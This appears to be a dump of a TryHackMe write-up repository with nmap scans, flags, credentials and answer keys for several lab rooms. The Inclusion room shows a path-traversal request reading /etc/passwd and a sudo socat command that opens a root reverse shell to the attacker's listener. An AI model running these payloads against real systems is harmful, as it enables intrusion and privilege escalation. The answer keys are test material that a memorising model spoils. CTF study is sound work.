https://nmap.org/submit/ ). 12 | TCP/IP fingerprint: 13 | OS:SCAN(V=7.80%E=4%D=5/25%OT=80%CT=1%CU=44385%PV=Y%DS=2%DC=T%G=Y%TM=5ECB8E3 14 | OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=102%TI=Z%CI=I%TS=A)SEQ(SP=1 15 | OS:02%GCD=1%ISR=103%TI=Z%CI=I%II=I%TS=A)SEQ(SP=102%GCD=1%ISR=103%TI=Z%II=I% 16 | OS:TS=A)OPS(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5 17 | OS:=M508ST11NW6%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6= 18 | OS:68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O% 19 | OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 20 | OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S 21 | OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R 22 | OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N 23 | OS:%T=40%CD=S) 24 | 25 | Network Distance: 2 hops 26 | 27 | TRACEROUTE (using port 993/tcp) 28 | HOP RTT ADDRESS 29 | 1 218.27 ms 10.9.0.1 30 | 2 290.46 ms 10.10.12.120 31 | 32 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 33 | # Nmap done at Mon May 25 14:51:57 2020 -- 1 IP address (1 host up) scanned in 47.56 seconds 34 | -------------------------------------------------------------------------------- /Inclusion/README.md: -------------------------------------------------------------------------------- 1 | # Inclusion | https://tryhackme.com/room/inclusion 2 | 3 | ### [Task 2] Root It 4 | 5 | If you've deployed the VM then try to find the LFI parameters and get the user and root flag. 6 | 7 | #1 user flag : `60989655118397345799` 8 | 9 | 10 | 11 | #2 root flag : `42964104845495153909` 12 | 13 | 14 | -------------------------------------------------------------------------------- /Inclusion/nmap_basic.nmap: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Mon May 25 13:54:16 2020 as: nmap -sC -sS -sV -A -O -oN nmap_basic.nmap 10.10.43.97 2 | Nmap scan report for 10.10.43.97 3 | Host is up (0.20s latency). 4 | Not shown: 998 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 7 | | ssh-hostkey: 8 | | 2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA) 9 | | 256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA) 10 | |_ 256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519) 11 | 80/tcp open http Werkzeug httpd 0.16.0 (Python 3.6.9) 12 | |_http-server-header: Werkzeug/0.16.0 Python/3.6.9 13 | |_http-title: My blog 14 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 15 | TCP/IP fingerprint: 16 | OS:SCAN(V=7.80%E=4%D=5/25%OT=22%CT=1%CU=40879%PV=Y%DS=2%DC=T%G=Y%TM=5ECB80D 17 | OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=10A%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS 18 | OS:(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST1 19 | OS:1NW6%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN 20 | OS:(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A 21 | OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R 22 | OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F 23 | OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% 24 | OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD 25 | OS:=S) 26 | 27 | Network Distance: 2 hops 28 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 29 | 30 | TRACEROUTE (using port 1025/tcp) 31 | HOP RTT ADDRESS 32 | 1 208.84 ms 10.9.0.1 33 | 2 194.01 ms 10.10.43.97 34 | 35 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 36 | # Nmap done at Mon May 25 13:54:50 2020 -- 1 IP address (1 host up) scanned in 35.03 seconds 37 | -------------------------------------------------------------------------------- /Inclusion/passwd.txt: -------------------------------------------------------------------------------- 1 | http://10.10.43.97/article?name=../../../../../../etc/passwd 2 | 3 | root:x:0:0:root:/root:/bin/bash 4 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 5 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 6 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 7 | sync:x:4:65534:sync:/bin:/bin/sync 8 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 9 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 10 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 11 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 12 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 13 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 14 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 15 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 16 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 17 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 18 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 19 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 20 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 21 | systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin 22 | systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin 23 | syslog:x:102:106::/home/syslog:/usr/sbin/nologin 24 | messagebus:x:103:107::/nonexistent:/usr/sbin/nologin 25 | _apt:x:104:65534::/nonexistent:/usr/sbin/nologin 26 | lxd:x:105:65534::/var/lib/lxd/:/bin/false 27 | uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin 28 | dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin 29 | landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin 30 | pollinate:x:109:1::/var/cache/pollinate:/bin/false 31 | falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash 32 | 33 | #falconfeast:rootpassword 34 | 35 | sshd:x:110:65534::/run/sshd:/usr/sbin/nologin 36 | mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false -------------------------------------------------------------------------------- /Inclusion/root.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Inclusion/root.png -------------------------------------------------------------------------------- /Inclusion/root.txt: -------------------------------------------------------------------------------- 1 | ╭─root@kali ~/TryHackMe/Rooms/Inclusion ‹master*› 2 | ╰─# socat file:`tty`,raw,echo=0 tcp-listen:1337 3 | 4 | root@inclusion:~# cd /root/ 5 | root@inclusion:/root# ls 6 | root.txt 7 | root@inclusion:/root# cat root.txt 8 | 42964104845495153909 9 | -------------------------------------------------------------------------------- /Inclusion/socat.txt: -------------------------------------------------------------------------------- 1 | get root access if user have sudo access for SOCAT : 2 | 3 | falconfeast@inclusion:~$ sudo -l 4 | Matching Defaults entries for falconfeast on inclusion: 5 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 6 | 7 | User falconfeast may run the following commands on inclusion: 8 | (root) NOPASSWD: /usr/bin/socat 9 | 10 | run this in your host system : socat file:`tty`,raw,echo=0 tcp-listen:1337 11 | 12 | and run this on the remote machine : sudo socat tcp-connect::1337 exec:bash,pty,stderr,setsid,sigint,sane 13 | -------------------------------------------------------------------------------- /Inclusion/ssh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Inclusion/ssh.png -------------------------------------------------------------------------------- /Inclusion/ssh.txt: -------------------------------------------------------------------------------- 1 | ssh falconfeast@10.10.43.97 2 | The authenticity of host '10.10.43.97 (10.10.43.97)' can't be established. 3 | ECDSA key fingerprint is SHA256:VRi7CZbTMsqjwnWmH2UVPWrLVIZzG4BQ9J6X+tVsuEQ. 4 | Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 5 | Warning: Permanently added '10.10.43.97' (ECDSA) to the list of known hosts. 6 | falconfeast@10.10.43.97's password: 7 | Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64) 8 | 9 | * Documentation: https://help.ubuntu.com 10 | * Management: https://landscape.canonical.com 11 | * Support: https://ubuntu.com/advantage 12 | 13 | System information as of Mon May 25 14:03:07 IST 2020 14 | 15 | System load: 0.0 Processes: 84 16 | Usage of /: 34.8% of 9.78GB Users logged in: 0 17 | Memory usage: 65% IP address for eth0: 10.10.43.97 18 | Swap usage: 0% 19 | 20 | 21 | * Canonical Livepatch is available for installation. 22 | - Reduce system reboots and improve kernel security. Activate at: 23 | https://ubuntu.com/livepatch 24 | 25 | 3 packages can be updated. 26 | 3 updates are security updates. 27 | 28 | 29 | Last login: Thu Jan 23 18:41:39 2020 from 192.168.1.107 30 | falconfeast@inclusion:~$ ls 31 | articles user.txt 32 | falconfeast@inclusion:~$ cat user.txt 33 | 60989655118397345799 -------------------------------------------------------------------------------- /Inclusion/view-source_10.10.43.97_article_name=.._.._.._.._.._.._etc_passwd.html: -------------------------------------------------------------------------------- 1 | 2 |
<!DOCTYPE html>

<html>

<body>


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash
#falconfeast:rootpassword
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false



</body>

</html>

-------------------------------------------------------------------------------- /Intro to Malware Analysis/README.md: -------------------------------------------------------------------------------- 1 | # Intro to Malware Analysis | https://tryhackme.com/room/malwareanalysisprimer 2 | 3 | ### [Task 2] Understanding Malware Campaigns 4 | 5 | #1 What is the famous example of a targeted attack-esque Malware that targeted Iran? : `Stuxnet` 6 | 7 | #2 What is the name of the Ransomware that used the Eternalblue exploit in a "Mass Campaign" attack? : `Wannacry` 8 | 9 | ### [Task 3] Identifying if a Malware Attack has Happened 10 | 11 | #1 Name the first essential step of a Malware Attack? : `Delivery` 12 | 13 | #2 Now name the second essential step of a Malware Attack? : `Execution` 14 | 15 | #3 What type of signature is used to classify remnants of infection on a host? : `Host-Based Signatures` 16 | 17 | #4 What is the name of the other classification of signature used after a Malware attack? : `Network-Based Signatures` 18 | 19 | ### [Task 7] Obtaining MD5 Checksums of Provided Files 20 | 21 | #1 The MD5 Checksum of aws.exe : `D2778164EF643BA8F44CC202EC7EF157` 22 | 23 | #2 The MD5 Checksum of Netlogo.exe : `59CB421172A89E1E16C11A428326952C` 24 | 25 | #3 The MD5 Checksum of vlc.exe : `5416BE1B8B04B1681CB39CF0E2CAAD9F` 26 | 27 | ### [Task 8] Now lets see if the MD5 Checksums have been analysed before 28 | 29 | #1 Does Virustotal report this MD5 Checksum / file aws.exe as malicious? (Yay/Nay) : `Nay` 30 | 31 | #2 Does Virustotal report this MD5 Checksum / file Netlogo.exe as malicious? (Yay/Nay) : `Nay` 32 | 33 | #3 Does Virustotal report this MD5 Checksum / file vlc.exe as malicious? (Yay/Nay) : `Nay` 34 | 35 | ### [Task 9] Identifying if the Executables are obfuscated / packed 36 | 37 | #1 What does PeID propose 1DE9176AD682FF.dll being packed with? : `Microsoft Visual C++ 6.0 DLL` 38 | 39 | #2 What does PeID propose AD29AA1B.bin being packed with? : `Microsoft Visual C++ 6.0` 40 | 41 | ### [Task 10] What is Obfuscation / Packing? 42 | 43 | #1 What packer does PeID report file "6F431F46547DB2628" to be packed with? : `FSG 1.0 -> dulek/xt` 44 | 45 | ### [Task 12] Introduction to Strings 46 | 47 | #1 What is the URL that is outputted after using "strings" : `practicalmalwareanalysis.com` 48 | 49 | #2 How many unique "Imports" are there? : `5` 50 | 51 | ### [Task 13] Introduction to Imports 52 | 53 | #1 How many references are there to the library "msi" in the "Imports" tab of IDA Freeware for "install.exe" : `9` 54 | 55 | ### [Task 14] Practical Summary 56 | 57 | #1 What is the MD5 Checksum of the file? : `f5bd8e6dc6782ed4dfa62b8215bdc429` 58 | 59 | #2 Does Virustotal report this file as malicious? (Yay/Nay) : `Nay` 60 | 61 | #3 Output the strings using Sysinternals "strings" tool. What is the last string outputted? : `d:h:` 62 | 63 | #4 What is the output of PeID when trying to detect what packer is used by the file? : `Nothing Found` 64 | -------------------------------------------------------------------------------- /Introductory Researching/README.md: -------------------------------------------------------------------------------- 1 | Introductory Researching | https://tryhackme.com/room/introtoresearch 2 | 3 | ### [Task 2] Example Research Question 4 | 5 | #1 : In the Burp Suite Program that ships with Kali Linux, what mode would you use to manually send a request (often repeating a captured request numerous times)? : ```Repeater``` 6 | 7 | #2 : What hash format are modern Windows login passwords stored in? : ```NTLM``` 8 | 9 | #3 : What are automated tasks called in Linux? : ```cron jobs``` 10 | 11 | #4 : What number base could you use as a shorthand for base 2 (binary)? : ```base 16``` 12 | 13 | #5 : If a password hash starts with $6$, what format is it (Unix variant)? : ```sha512crypt``` 14 | 15 | ### [Task 3] Vulnerability Searching 16 | 17 | #1 : What is the CVE for the 2020 Cross-Site Scripting (XSS) vulnerability found in WPForms? : ```CVE-2020-10385``` 18 | 19 | #2 : There was a Local Privilege Escalation vulnerability found in the Debian version of Apache Tomcat, back in 2016. What's the CVE for this vulnerability? : ```CVE-2016-1240``` 20 | 21 | #3 : What is the very first CVE found in the VLC media player? : ```CVE-2007-0017``` 22 | 23 | #4 : If I wanted to exploit a 2020 buffer overflow in the sudo program, which CVE would I use? : ```CVE: 2019-18634``` 24 | 25 | ### [Task 4] Manual Pages 26 | 27 | #1 : SCP is a tool used to copy files from one computer to another. What switch would you use to copy an entire directory? : ```-r``` 28 | 29 | #2 : fdisk is a command used to view and alter the partitioning scheme used on your hard drive. What switch would you use to list the current partitions? : ```-l``` 30 | 31 | #3 : nano is an easy-to-use text editor for Linux. There are arguably better editors (Vim, being the obvious choice); however, nano is a great one to start with. What switch would you use to make a backup when opening a file with nano? : ```-B``` 32 | 33 | #4 : Netcat is a basic tool used to manually send and receive network requests. What command would you use to start netcat in listen mode, using port 12345? : ```nc -l -p 12345``` 34 | -------------------------------------------------------------------------------- /Learn Linux/README.md: -------------------------------------------------------------------------------- 1 | # Learn Linux | https://tryhackme.com/room/zthlinux 2 | 3 | ### [Task 6] [Section 2: Running Commands] - Manual Pages and Flags 4 | 5 | 1 - How would you output hello without a newline : `echo -n hello` 6 | 7 | ### [Task 7] [Section 3: Basic File Operations] - ls 8 | 9 | 1 - What flag outputs all entries : `-a` 10 | 11 | 2 - What flag outputs things in a "long list" format : `-l` 12 | 13 | ### [Task 8] [Section 3: Basic File Operations] - cat 14 | 15 | 1 - What flag numbers all output lines? : `-n` 16 | 17 | ### [Task 10] [Section 3: Basic File Operations] - Running A Binary 18 | 19 | 1 - How would you run a binary called hello using the directory shortcut . ? : `./hello` 20 | 21 | 2 - How would you run a binary called hello in your home directory using the shortcut ~ ? : `~/hello` 22 | 23 | 3 - How would you run a binary called hello in the previous directory using the shortcut .. ? : `../hello` 24 | 25 | ### [Task 11] Binary - Shiba1 26 | 27 | 1 - What's the password for shiba2 : `pinguftw` 28 | 29 | 30 | 31 | ### [Task 12] su 32 | 33 | 1 - How do you specify which shell is used when you login? : `-s` 34 | 35 | ### [Task 14] [Section 4: Linux Operators]: ">" 36 | 37 | 1 - How would you output twenty to a file called test : `echo twenty > test` 38 | 39 | ### [Task 18] [Section 4: Linux Operators]: "$" 40 | 41 | 1 - How would you set nootnoot equal to 1111 : `export nootnoot=1111` 42 | 43 | 2 - What is the value of the home environment variable : `/home/shiba2` 44 | 45 | ### [Task 21] Binary - shiba2 46 | 47 | 1 - What is shiba3's password : `happynootnoises` 48 | 49 | 50 | 51 | ### [Task 24] [Section 5: Advanced File Operations]: chmod 52 | 53 | 1 - What permissions mean the user can read the file, the group can read and write to the file, and no one else can read, write or execute the file? : `460` 54 | 55 | 2 - What permissions mean the user can read, write, and execute the file, the group can read, write, and execute the file, and everyone else can read, write, and execute the file. : `777` 56 | 57 | ### [Task 25] [Section 5: Advanced File Operations] - chown 58 | 59 | 1 - How would you change the owner of file to paradox : `chown paradox file` 60 | 61 | 2 - What about the owner and the group of file to paradox : `chown paradox:paradox file` 62 | 63 | 3 - What flag allows you to operate on every file in the directory at once? : `-R` 64 | 65 | ### [Task 26] [Section 5: Advanced File Operations] - rm 66 | 67 | 1 - What flag deletes every file in a directory : `-r` 68 | 69 | 2 - How do you suppress all warning prompts : `-f` 70 | 71 | ### [Task 27] [Section 5: Advanced File Operations] - mv 72 | 73 | 1 - How would you move file to /tmp : `mv file /tmp` 74 | 75 | ### [Task 29] [Section 5: Advanced file Operations] - cd && mkdir 76 | 77 | 1 - Using relative paths, how would you cd to your home directory. : `cd ~` 78 | 79 | 2 - Using absolute paths how would you make a directory called test in /tmp : `mkdir /tmp/test` 80 | 81 | ### [Task 30] [Section 5: Advanced File Operations] ln 82 | 83 | 1 - How would I link /home/test/testfile to /tmp/test : `ln /home/test/testfile /tmp/test` 84 | 85 | ### [Task 31] [Section 5 - Advanced File Operations]: find 86 | 87 | 1 - How do you find files that have specific permissions? : `-perm` 88 | 89 | 2 - How would you find all the files in /home : `find /home` 90 | 91 | 3 - How would you find all the files owned by paradox on the whole system : `find / -user paradox` 92 | 93 | ### [Task 32] [Section 5: Advanced File Operations] - grep 94 | 95 | 1 - What flag lists line numbers for every string found? : `-n` 96 | 97 | 2 - How would I search for the string boop in the file aaaa in the directory /tmp : `grep boop /tmp/aaaa` 98 | 99 | ### [Task 33] Binary - Shiba3 100 | 101 | 1 - What is shiba4's password : `test1234` 102 | 103 | 104 | 105 | 106 | 107 | ### [Task 35] [Section 6: Miscellaneous]: sudo 108 | 109 | 1 - How do you specify which user you want to run a command as. : `-u` 110 | 111 | 2 - How would I run whoami as user jen? : `sudo -u jen whoami` 112 | 113 | 3 - How do you list your current sudo privileges(what commands you can run, who you can run them as etc.) : `-l` 114 | 115 | ### [Task 36] [Section 6: Miscellaneous]: Adding users and groups 116 | 117 | 1 - How would I add the user test to the group test : `sudo usermod -a -G test test` 118 | 119 | ### [Task 43] Bonus Challenge - The True Ending 120 | 121 | 1 - Finish this room off! What is the root.txt flag : `ad91979868d06e19d8e8a9c28be56e0c` 122 | 123 | 124 | 125 | 126 | 127 | 128 | -------------------------------------------------------------------------------- /Learn Linux/creds.txt: -------------------------------------------------------------------------------- 1 | shiba1 : shiba1 2 | 3 | shiba2 : pinguftw 4 | 5 | shiba3 : happynootnoises 6 | 7 | shiba4 : test1234 8 | 9 | nootnoot : notsofast -------------------------------------------------------------------------------- /Learn Linux/find-shiba4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/find-shiba4.png -------------------------------------------------------------------------------- /Learn Linux/find_user.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/find_user.png -------------------------------------------------------------------------------- /Learn Linux/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/flag.png -------------------------------------------------------------------------------- /Learn Linux/shiba2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/shiba2.png -------------------------------------------------------------------------------- /Learn Linux/shiba3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/shiba3.png -------------------------------------------------------------------------------- /Learn Linux/shiba4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/shiba4.png -------------------------------------------------------------------------------- /Learn Linux/test1234.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/test1234.png -------------------------------------------------------------------------------- /Lord of the Root/README.md: -------------------------------------------------------------------------------- 1 | # Lord of the Root | https://tryhackme.com/room/lordoftheroot 2 | 3 | ### [Task 2] Can you root the box? 4 | 5 | #2 Hmmm, what method is used to reveal hidden ports? : ```port knocking``` 6 | 7 | #3 What port is the hidden service on? : ```1337``` 8 | 9 | #6 Whats the method to exploit the system for privilege escalation called? : ```buffer overflow``` 10 | 11 | #7 Who wrote the message in the flag message in the roots home directory? : ```Gandalf``` 12 | -------------------------------------------------------------------------------- /Lord of the Root/creds.txt: -------------------------------------------------------------------------------- 1 | smeagol : MyPreciousR00t -------------------------------------------------------------------------------- /Lord of the Root/exploit.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Lord of the Root/exploit.rar -------------------------------------------------------------------------------- /Lord of the Root/nmap_10.10.213.122.txt: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Sun Mar 22 17:12:31 2020 as: nmap -sV -sS -sC -A -O -oN nmap_10.10.213.122.txt 10.10.213.122 2 | Nmap scan report for 10.10.213.122 3 | Host is up (0.22s latency). 4 | Not shown: 999 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0) 7 | | ssh-hostkey: 8 | | 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA) 9 | | 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA) 10 | | 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA) 11 | |_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519) 12 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 13 | TCP/IP fingerprint: 14 | OS:SCAN(V=7.80%E=4%D=3/22%OT=22%CT=1%CU=44571%PV=Y%DS=2%DC=T%G=Y%TM=5E774F4 15 | OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=106%TI=Z%II=I%TS=8)SEQ(SP=1 16 | OS:05%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS=8)OPS(O1=M54DST11NW6%O2=M54DST11NW6%O 17 | OS:3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST11NW6%O6=M54DST11)WIN(W1=68DF%W2= 18 | OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M54DNNSN 19 | OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D 20 | OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O 21 | OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W 22 | OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R 23 | OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) 24 | 25 | Network Distance: 2 hops 26 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 27 | 28 | TRACEROUTE (using port 110/tcp) 29 | HOP RTT ADDRESS 30 | 1 252.23 ms 10.9.0.1 31 | 2 252.44 ms 10.10.213.122 32 | 33 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 34 | # Nmap done at Sun Mar 22 17:13:06 2020 -- 1 IP address (1 host up) scanned in 35.02 seconds 35 | -------------------------------------------------------------------------------- /Lord of the Root/nmap_allport_10.10.213.122.txt: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Sun Mar 22 17:16:17 2020 as: nmap -sS -p- -vv --script vuln -oN nmap_allport_10.10.213.122.txt 10.10.213.122 2 | Increasing send delay for 10.10.213.122 from 0 to 5 due to 880 out of 2932 dropped probes since last increase. 3 | Nmap scan report for 10.10.213.122 4 | Host is up, received echo-reply ttl 63 (0.21s latency). 5 | Scanned at 2020-03-22 17:16:27 IST for 1180s 6 | Not shown: 65533 closed ports 7 | Reason: 65533 resets 8 | PORT STATE SERVICE REASON 9 | 22/tcp open ssh syn-ack ttl 63 10 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 11 | 1337/tcp open waste syn-ack ttl 63 12 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 13 | 14 | Read data files from: /usr/bin/../share/nmap 15 | # Nmap done at Sun Mar 22 17:36:07 2020 -- 1 IP address (1 host up) scanned in 1190.68 seconds 16 | -------------------------------------------------------------------------------- /Mr. Robot CTF/README.md: -------------------------------------------------------------------------------- 1 | # Mr. ROBOT CTF | https://tryhackme.com/room/mrrobot 2 | 3 | ### [Task 2] Hack the machine 4 | 5 | Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them? 6 | 7 | #1 What is key 1? : ```073403c8a58a1f80d943455fb30724b9``` 8 | 9 | #2 What is key 2? : ```822c73956184f694993bede3eb39f959``` 10 | 11 | #3 What is key 3? : ```04787ddef27c3dee1ee161b21670b4e4``` 12 | -------------------------------------------------------------------------------- /OWASP Juice Shop/README.md: -------------------------------------------------------------------------------- 1 | # OWASP Juice Shop | https://tryhackme.com/room/juiceshop 2 | 3 | ### [Task 5] Broken Authentication 4 | 5 | #1 reset Jim's password using the forgotten password mechanism - what was the answer to the secret question? : `Samuel` 6 | 7 | #2 What is the administrator password? : `admin123` 8 | 9 | ### [Task 6] Sensitive Data Exposure 10 | 11 | #1 Access a confidential document and enter the name of the first file with the extension ".md" : `acquisitions.md` 12 | 13 | ### [Task 7] Broken Access Control 14 | 15 | #1 Access the administration section of the store - What is the name of the page? : `administration` 16 | -------------------------------------------------------------------------------- 